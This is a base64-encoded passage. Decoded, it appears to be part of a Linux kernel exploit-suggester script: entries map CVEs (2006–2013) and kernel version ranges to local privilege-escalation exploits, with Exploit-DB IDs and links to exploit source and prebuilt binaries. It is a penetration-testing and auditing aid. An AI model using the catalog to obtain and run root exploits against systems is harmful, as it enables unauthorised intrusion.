azogMQpleHBsb2l0LWRiOiAyMDA0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGwyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA1CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGwzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDA2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMjQ1MV0ke3R4dHJzdH0gcHJjdGw0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTMsdmVyPD0yLjYuMTcKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAyMDExCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDYtMzYyNl0ke3R4dHJzdH0gaDAwbHlzaGl0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuOCx2ZXI8PTIuNi4xNgpUYWdzOgpSYW5rOiAxCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDExMTEwMzA0MjkwNC9odHRwOi8vdGFyYW50dWxhLmJ5LnJ1L2xvY2Fscm9vdC8yLjYueC9oMDBseXNoaXQKZXhwbG9pdC1kYjogMjAxMwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTA2MDBdJHt0eHRyc3R9IHZtc3BsaWNlMQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE3LHZlcjw9Mi42LjI0ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogNTA5MgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTA2MDBdJHt0eHRyc3R9IHZtc3BsaWNlMgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjIzLHZlcjw9Mi42LjI0ClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogNTA5MwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA4LTQyMTBdJHt0eHRyc3R9IGZ0cmV4ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTEsdmVyPD0yLjYuMjIKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA2ODUxCkNvbW1lbnRzOiB3b3JsZC13cml0YWJsZSBzZ2lkIGRpcmVjdG9yeSBhbmQgc2hlbGwgdGhhdCBkb2VzIG5vdCBkcm9wIHNnaWQgcHJpdnMgdXBvbiBleGVjIChhc2gvc2FzaCkgYXJlIHJlcXVpcmVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDgtNDIxMF0ke3R4dHJzdH0gZXhpdF9ub3RpZnkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4yNSx2ZXI8PTIuNi4yOQpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDgzNjkKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyXSR7dHh0cnN0fSBzb2NrX3NlbmRwYWdlIChzaW1wbGUgdmVyc2lvbikKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMwClRhZ3M6IHVidW50dT03LjEwLFJIRUw9NCxmZWRvcmE9NHw1fDZ8N3w4fDl8MTB8MTEKUmFuazogMQpleHBsb2l0LWRiOiA5NDc5CkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMwClRhZ3M6IHVidW50dT05LjA0ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3hvcmwud29yZHByZXNzLmNvbS8yMDA5LzA3LzE2L2N2ZS0yMDA5LTE4OTUtbGludXgta2VybmVsLXBlcl9jbGVhcl9vbl9zZXRpZC1wZXJzb25hbGl0eS1ieXBhc3MvCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9vZmZlbnNpdmUtc2VjdXJpdHkvZXhwbG9pdC1kYXRhYmFzZS1iaW4tc3Bsb2l0cy9yYXcvbWFzdGVyL2Jpbi1zcGxvaXRzLzk0MzUudGd6CmV4cGxvaXQtZGI6IDk0MzUKQ29tbWVudHM6IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIG5lZWRzIHRvIGVxdWFsIDAgT1IgcHVsc2VhdWRpbyBuZWVkcyB0byBiZSBpbnN0YWxsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiAKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NDM2LnRnegpleHBsb2l0LWRiOiA5NDM2CkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjkyLENWRS0yMDA5LTE4OTVdJHt0eHRyc3R9IHNvY2tfc2VuZHBhZ2UzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiAKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NjQxLnRhci5negpleHBsb2l0LWRiOiA5NjQxCkNvbW1lbnRzOiAvcHJvYy9zeXMvdm0vbW1hcF9taW5fYWRkciBuZWVkcyB0byBlcXVhbCAwIE9SIHB1bHNlYXVkaW8gbmVlZHMgdG8gYmUgaW5zdGFsbGVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMjY5MixDVkUtMjAwOS0xODk1XSR7dHh0cnN0fSBzb2NrX3NlbmRwYWdlIChwcGMpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMApUYWdzOiB1YnVudHU9OC4xMCxSSEVMPTR8NQpSYW5rOiAxCmV4cGxvaXQtZGI6IDk1NDUKQ29tbWVudHM6IC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIG5lZWRzIHRvIGVxdWFsIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjk4XSR7dHh0cnN0fSB0aGUgcmViZWwgKHVkcF9zZW5kbXNnKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkKVGFnczogZGViaWFuPTQKUmFuazogMQpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy85NTc0LnRnegpleHBsb2l0LWRiOiA5NTc0CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9ibG9nLmNyMC5vcmcvMjAwOS8wOC9jdmUtMjAwOS0yNjk4LXVkcHNlbmRtc2ctdnVsbmVyYWJpbGl0eS5odG1sCmF1dGhvcjogc3BlbmRlcgpDb21tZW50czogL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgbmVlZHMgdG8gZXF1YWwgMCBPUiBwdWxzZWF1ZGlvIG5lZWRzIHRvIGJlIGluc3RhbGxlZApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OThdJHt0eHRyc3R9IGhvYWdpZV91ZHBfc2VuZG1zZwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkseDg2ClRhZ3M6IGRlYmlhbj00ClJhbms6IDEKZXhwbG9pdC1kYjogOTU3NQphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbAphdXRob3I6IGFuZGkKQ29tbWVudHM6IFdvcmtzIGZvciBzeXN0ZW1zIHdpdGggL3Byb2Mvc3lzL3ZtL21tYXBfbWluX2FkZHIgZXF1YWwgdG8gMApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTI2OThdJHt0eHRyc3R9IGthdG9uICh1ZHBfc2VuZG1zZykKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xLHZlcjw9Mi42LjE5LHg4NgpUYWdzOiBkZWJpYW49NApSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9LYWJvdC9Vbml4LVByaXZpbGVnZS1Fc2NhbGF0aW9uLUV4cGxvaXRzLVBhY2svcmF3L21hc3Rlci8yMDA5L0NWRS0yMDA5LTI2OTgva2F0b24uYwphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbAphdXRob3I6IFZ4SGVsbCBMYWJzCkNvbW1lbnRzOiBXb3JrcyBmb3Igc3lzdGVtcyB3aXRoIC9wcm9jL3N5cy92bS9tbWFwX21pbl9hZGRyIGVxdWFsIHRvIDAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0yNjk4XSR7dHh0cnN0fSBpcF9hcHBlbmRfZGF0YQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjEsdmVyPD0yLjYuMTkseDg2ClRhZ3M6IGZlZG9yYT00fDV8NixSSEVMPTQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vYmxvZy5jcjAub3JnLzIwMDkvMDgvY3ZlLTIwMDktMjY5OC11ZHBzZW5kbXNnLXZ1bG5lcmFiaWxpdHkuaHRtbApleHBsb2l0LWRiOiA5NTQyCmF1dGhvcjogcDBjNzNuMQpDb21tZW50czogV29ya3MgZm9yIHN5c3RlbXMgd2l0aCAvcHJvYy9zeXMvdm0vbW1hcF9taW5fYWRkciBlcXVhbCB0byAwCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMzU0N10ke3R4dHJzdH0gcGlwZS5jIDEKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjMxClRhZ3M6ClJhbms6IDEKZXhwbG9pdC1kYjogMzMzMjEKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0zNTQ3XSR7dHh0cnN0fSBwaXBlLmMgMgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiAzMzMyMgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDA5LTM1NDddJHt0eHRyc3R9IHBpcGUuYyAzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zMQpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDEwMDE4CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMzMwMV0ke3R4dHJzdH0gcHRyYWNlX2ttb2QyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMjYsdmVyPD0yLjYuMzQKVGFnczogZGViaWFuPTYuMHtrZXJuZWw6Mi42LigzMnwzM3wzNHwzNSktKDF8Mnx0cnVuayktYW1kNjR9LHVidW50dT0oMTAuMDR8MTAuMTApe2tlcm5lbDoyLjYuKDMyfDM1KS0oMTl8MjF8MjQpLXNlcnZlcn0KUmFuazogMQpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxMTExMDMwNDI5MDQvaHR0cDovL3RhcmFudHVsYS5ieS5ydS9sb2NhbHJvb3QvMi42Lngva21vZDIKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTExMTAzMDQyOTA0L2h0dHA6Ly90YXJhbnR1bGEuYnkucnUvbG9jYWxyb290LzIuNi54L3B0cmFjZS1rbW9kCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjY0MS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL3B0cmFjZV9rbW9kMi02NApleHBsb2l0LWRiOiAxNTAyMwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEwLTExNDZdJHt0eHRyc3R9IHJlaXNlcmZzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPD0yLjYuMzQKVGFnczogdWJ1bnR1PTkuMTAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vam9uLm9iZXJoZWlkZS5vcmcvYmxvZy8yMDEwLzA0LzEwL3JlaXNlcmZzLXJlaXNlcmZzX3ByaXYtdnVsbmVyYWJpbGl0eS8Kc3JjLXVybDogaHR0cHM6Ly9qb24ub2JlcmhlaWRlLm9yZy9maWxlcy90ZWFtLWVkd2FyZC5weQpleHBsb2l0LWRiOiAxMjEzMApjb21tZW50czogUmVxdWlyZXMgYSBSZWlzZXJGUyBmaWxlc3lzdGVtIG1vdW50ZWQgd2l0aCBleHRlbmRlZCBhdHRyaWJ1dGVzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMjk1OV0ke3R4dHJzdH0gY2FuX2JjbQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE4LHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0xMC4wNHtrZXJuZWw6Mi42LjMyLTI0LWdlbmVyaWN9ClJhbms6IDEKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjQxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvY2FuX2JjbQpleHBsb2l0LWRiOiAxNDgxNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEwLTM5MDRdJHt0eHRyc3R9IHJkcwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjMwLHZlcjwyLjYuMzcKVGFnczogZGViaWFuPTYuMHtrZXJuZWw6Mi42LigzMXwzMnwzNHwzNSktKDF8dHJ1bmspLWFtZDY0fSx1YnVudHU9MTAuMTB8OS4xMCxmZWRvcmE9MTN7a2VybmVsOjIuNi4zMy4zLTg1LmZjMTMuaTY4Ni5QQUV9LHVidW50dT0xMC4wNHtrZXJuZWw6Mi42LjMyLSgyMXwyNCktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuc2VjdXJpdHlmb2N1cy5jb20vYXJjaGl2ZS8xLzUxNDM3OQpzcmMtdXJsOiBodHRwOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDEwMTAyMDA0NDA0OC9odHRwOi8vd3d3LnZzZWN1cml0eS5jb20vZG93bmxvYWQvdG9vbHMvbGludXgtcmRzLWV4cGxvaXQuYwpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2NDEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9yZHMKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjQxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvcmRzNjQKZXhwbG9pdC1kYjogMTUyODUKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC0zODQ4LENWRS0yMDEwLTM4NTAsQ1ZFLTIwMTAtNDA3M10ke3R4dHJzdH0gaGFsZl9uZWxzb24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0oMTAuMDR8OS4xMCl7a2VybmVsOjIuNi4oMzF8MzIpLSgxNHwyMSktc2VydmVyfQpSYW5rOiAxCmJpbi11cmw6IGh0dHA6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvaGFsZi1uZWxzb24zCmV4cGxvaXQtZGI6IDE3Nzg3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bTi9BXSR7dHh0cnN0fSBjYXBzX3RvX3Jvb3QKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zNCx2ZXI8PTIuNi4zNix4ODYKVGFnczogdWJ1bnR1PTEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTU5MTYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtOL0FdJHt0eHRyc3R9IGNhcHNfdG9fcm9vdCAyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzQsdmVyPD0yLjYuMzYKVGFnczogdWJ1bnR1PTEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTU5NDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC00MzQ3XSR7dHh0cnN0fSBhbWVyaWNhbi1zaWduLWxhbmd1YWdlClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zNgpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDE1Nzc0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMzQzN10ke3R4dHJzdH0gcGt0Y2R2ZApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzYKVGFnczogdWJ1bnR1PTEwLjA0ClJhbms6IDEKZXhwbG9pdC1kYjogMTUxNTAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC0zMDgxXSR7dHh0cnN0fSB2aWRlbzRsaW51eApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzMKVGFnczogUkhFTD01ClJhbms6IDEKZXhwbG9pdC1kYjogMTUwMjQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMi0wMDU2XSR7dHh0cnN0fSBtZW1vZGlwcGVyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMCx2ZXI8PTMuMS4wClRhZ3M6IHVidW50dT0oMTAuMDR8MTEuMTApe2tlcm5lbDozLjAuMC0xMi0oZ2VuZXJpY3xzZXJ2ZXIpfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXQuengyYzQuY29tL0NWRS0yMDEyLTAwNTYvYWJvdXQvCnNyYy11cmw6IGh0dHBzOi8vZ2l0Lnp4MmM0LmNvbS9DVkUtMjAxMi0wMDU2L3BsYWluL21lbXBvZGlwcGVyLmMKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvbWVtb2RpcHBlcgpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2MzEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9tZW1vZGlwcGVyNjQKZXhwbG9pdC1kYjogMTg0MTEKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMi0wMDU2LENWRS0yMDEwLTM4NDksQ1ZFLTIwMTAtMzg1MF0ke3R4dHJzdH0gZnVsbC1uZWxzb24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0oOS4xMHwxMC4xMCl7a2VybmVsOjIuNi4oMzF8MzUpLSgxNHwxOSktKHNlcnZlcnxnZW5lcmljKX0sdWJ1bnR1PTEwLjA0e2tlcm5lbDoyLjYuMzItKDIxfDI0KS1zZXJ2ZXJ9ClJhbms6IDEKc3JjLXVybDogaHR0cDovL3Z1bG5mYWN0b3J5Lm9yZy9leHBsb2l0cy9mdWxsLW5lbHNvbi5jCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL2Z1bGwtbmVsc29uCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL2Z1bGwtbmVsc29uNjQKZXhwbG9pdC1kYjogMTU3MDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMy0xODU4XSR7dHh0cnN0fSBDTE9ORV9ORVdVU0VSfENMT05FX0ZTClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPTMuOCxDT05GSUdfVVNFUl9OUz15ClRhZ3M6IApSYW5rOiAxCnNyYy11cmw6IGh0dHA6Ly9zdGVhbHRoLm9wZW53YWxsLm5ldC94U3BvcnRzL2Nsb3duLW5ld3VzZXIuYwphbmFseXNpcy11cmw6IGh0dHBzOi8vbHduLm5ldC9BcnRpY2xlcy81NDMyNzMvCmV4cGxvaXQtZGI6IDM4MzkwCmF1dGhvcjogU2ViYXN0aWFuIEtyYWhtZXIKQ29tbWVudHM6IENPTkZJR19VU0VSX05TIG5lZWRzIHRvIGJlIGVuYWJsZWQgCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gcGVyZl9zd2V2ZW50ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzIsdmVyPDMuOC45LHg4Nl82NApUYWdzOiBSSEVMPTYsdWJ1bnR1PTEyLjA0e2tlcm5lbDozLjIuMC0oMjN8MjkpLWdlbmVyaWN9LGZlZG9yYT0xNntrZXJuZWw6My4xLjAtNy5mYzE2Lng4Nl82NH0sZmVkb3JhPTE3e2tlcm5lbDozLjMuNC01LmZjMTcueDg2XzY0fSxkZWJpYW49N3trZXJuZWw6My4yLjAtNC1hbWQ2NH0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly90aW1ldG9ibGVlZC5jb20vYS1jbG9zZXItbG9vay1hdC1hLXJlY2VudC1wcml2aWxlZ2UtZXNjYWxhdGlvbi1idWctaW4tbGludXgtY3ZlLTIwMTMtMjA5NC8KYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvcGVyZl9zd2V2ZW50CmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL3BlcmZfc3dldmVudDY0CmV4cGxvaXQtZGI6IDI2MTMxCmF1dGhvcjogQW5kcmVhICdzb3JibycgQml0dGF1CkNvbW1lbnRzOiBObyBTTUVQL1NNQVAgYnlwYXNzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gcGVyZl9zd2V2ZW50IDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zMix2ZXI8My44LjkseDg2XzY0ClRhZ3M6IHVidW50dT0xMi4wNHtrZXJuZWw6My4oMnw1KS4wLSgyM3wyOSktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly90aW1ldG9ibGVlZC5jb20vYS1jbG9zZXItbG9vay1hdC1hLXJlY2VudC1wcml2aWxlZ2UtZXNjYWxhdGlvbi1idWctaW4tbGludXgtY3ZlLTIwMTMtMjA5NC8Kc3JjLXVybDogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL2V4cGxvaXRzL3ZuaWtfdjEuYwpleHBsb2l0LWRiOiAzMzU4OQphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkNvbW1lbnRzOiBObyBTTUVQL1NNQVAgYnlwYXNzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMDI2OF0ke3R4dHJzdH0gbXNyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPDMuNy42ClRhZ3M6IApSYW5rOiAxCmV4cGxvaXQtZGI6IDI3Mjk3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMTk1OV0ke3R4dHJzdH0gdXNlcm5zX3Jvb3Rfc3Bsb2l0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8My44LjkKVGFnczogClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxMy8wNC8yOS8xCmV4cGxvaXQtZGI6IDI1NDU